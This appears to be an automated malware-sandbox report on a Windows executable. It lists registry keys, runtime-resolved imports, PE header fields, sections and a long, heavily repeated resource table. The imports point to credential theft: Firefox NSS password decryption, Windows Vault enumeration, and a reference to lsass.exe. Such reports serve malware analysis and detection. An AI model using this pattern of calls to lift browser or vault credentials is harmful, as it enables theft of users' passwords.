HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
\x5a60\x170EY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\75.0 (x86 en-GB)\Main\Install Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernelbase.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.ProcessIdToSessionId
imm32.dll.ImmCreateContext
imm32.dll.ImmDestroyContext
imm32.dll.ImmNotifyIME
imm32.dll.ImmAssociateContext
imm32.dll.ImmReleaseContext
imm32.dll.ImmGetContext
imm32.dll.ImmGetCompositionStringA
imm32.dll.ImmSetCompositionStringA
imm32.dll.ImmGetCompositionStringW
imm32.dll.ImmSetCompositionStringW
imm32.dll.ImmSetCandidateWindow
kernel32.dll.GetDiskFreeSpaceExA
oleaut32.dll.VariantChangeTypeEx
oleaut32.dll.VarNeg
oleaut32.dll.VarNot
oleaut32.dll.VarAdd
oleaut32.dll.VarSub
oleaut32.dll.VarMul
oleaut32.dll.VarDiv
oleaut32.dll.VarIdiv
oleaut32.dll.VarMod
oleaut32.dll.VarAnd
oleaut32.dll.VarOr
oleaut32.dll.VarXor
oleaut32.dll.VarCmp
oleaut32.dll.VarI4FromStr
oleaut32.dll.VarR4FromStr
oleaut32.dll.VarR8FromStr
oleaut32.dll.VarDateFromStr
oleaut32.dll.VarCyFromStr
oleaut32.dll.VarBoolFromStr
oleaut32.dll.VarBstrFromCy
oleaut32.dll.VarBstrFromDate
oleaut32.dll.VarBstrFromBool
user32.dll.GetMonitorInfoA
user32.dll.GetSystemMetrics
user32.dll.EnumDisplayMonitors
user32.dll.AnimateWindow
comctl32.dll.InitializeFlatSB
comctl32.dll.UninitializeFlatSB
comctl32.dll.FlatSB_GetScrollProp
comctl32.dll.FlatSB_SetScrollProp
comctl32.dll.FlatSB_EnableScrollBar
comctl32.dll.FlatSB_ShowScrollBar
comctl32.dll.FlatSB_GetScrollRange
comctl32.dll.FlatSB_GetScrollInfo
comctl32.dll.FlatSB_GetScrollPos
comctl32.dll.FlatSB_SetScrollPos
comctl32.dll.FlatSB_SetScrollInfo
comctl32.dll.FlatSB_SetScrollRange
user32.dll.SetLayeredWindowAttributes
kernel32.dll.GetSystemTimeAsFileTime
kernel32.dll.FileTimeToSystemTime
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptReleaseContext
nss3.dll.NSS_Init
nss3.dll.NSS_Shutdown
nss3.dll.PK11_GetInternalKeySlot
nss3.dll.PK11_FreeSlot
nss3.dll.PK11_Authenticate
nss3.dll.PK11SDR_Decrypt
nss3.dll.PK11_CheckUserPassword
nss3.dll.SECITEM_FreeItem
kernel32.dll.InitializeCriticalSectionEx
softokn3.dll.NSC_GetFunctionList
softokn3.dll.NSC_ModuleDBFunc
freebl3.dll.FREEBL_GetVector
cryptbase.dll.SystemFunction001
cryptbase.dll.SystemFunction002
cryptbase.dll.SystemFunction003
cryptbase.dll.SystemFunction004
cryptbase.dll.SystemFunction005
cryptbase.dll.SystemFunction028
cryptbase.dll.SystemFunction029
cryptbase.dll.SystemFunction034
cryptbase.dll.SystemFunction036
cryptbase.dll.SystemFunction040
cryptbase.dll.SystemFunction041
vaultcli.dll.VaultEnumerateItems
vaultcli.dll.VaultEnumerateVaults
vaultcli.dll.VaultFree
vaultcli.dll.VaultGetItem
vaultcli.dll.VaultOpenVault
vaultcli.dll.VaultCloseVault
sechost.dll.LookupAccountSidLocalW
netapi32.dll.NetUserGetInfo
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptSetKeyParam
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptDestroyKey
"C:\Users\Rebecca\AppData\Local\Temp\file.exe"
C:\Windows\system32\lsass.exe
D4D5A6DF569DD66C39E6EB85
VaultSvc

PE Information

Image Base Entry Point Reported Checksum Actual Checksum Minimum OS Version Compile Time Import Hash Icon Icon Exact Hash Icon Similarity Hash
0x00400000 0x00457b6c 0x00000000 0x0009bd5d 4.0 1992-06-19 22:22:17 24f26e153c9b6068c0a4770547eb6d9e 4cf760beac787663dc2db01e7654eb2e eb7d7358ac4a8bf108c694ceccf9017d

Sections

Name RAW Address Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
CODE 0x00000400 0x00001000 0x00056bb4 0x00056c00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.53
DATA 0x00057000 0x00058000 0x0000d8e4 0x0000da00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 4.61
BSS 0x00064a00 0x00066000 0x00000e49 0x00000000 IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.idata 0x00064a00 0x00067000 0x00001ffe 0x00002000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 5.02
.tls 0x00066a00 0x00069000 0x00000010 0x00000000 IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rdata 0x00066a00 0x0006a000 0x00000018 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 0.21
.reloc 0x00066c00 0x0006b000 0x00006994 0x00006a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 6.65
.rsrc 0x0006d600 0x00072000 0x00027658 0x00027800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ 7.13

Resources

Name Offset Size Language Sub-language Entropy File type
RT_CURSOR 0x000762b8 0x00000134 LANG_NEUTRAL SUBLANG_NEUTRAL 2.92 None
RT_CURSOR 0x000762b8 0x00000134 LANG_NEUTRAL SUBLANG_NEUTRAL 2.92 None
RT_CURSOR 0x000762b8 0x00000134 LANG_NEUTRAL SUBLANG_NEUTRAL 2.92 None
RT_CURSOR 0x000762b8 0x00000134 LANG_NEUTRAL SUBLANG_NEUTRAL 2.92 None
RT_CURSOR 0x000762b8 0x00000134 LANG_NEUTRAL SUBLANG_NEUTRAL 2.92 None
RT_CURSOR 0x000762b8 0x00000134 LANG_NEUTRAL SUBLANG_NEUTRAL 2.92 None
RT_CURSOR 0x000762b8 0x00000134 LANG_NEUTRAL SUBLANG_NEUTRAL 2.92 None
RT_BITMAP 0x00077620 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x00077620 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x00077620 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x00077620 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x00077620 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x00077620 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x00077620 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x00077620 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x00077620 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x00077620 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_BITMAP 0x00077620 0x000000e8 LANG_NEUTRAL SUBLANG_NEUTRAL 2.85 None
RT_ICON 0x00077708 0x00000128 LANG_ENGLISH SUBLANG_ENGLISH_US 3.32 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
RT_MENU 0x00095868 0x000001e2 LANG_ENGLISH SUBLANG_ENGLISH_US 0.00 None
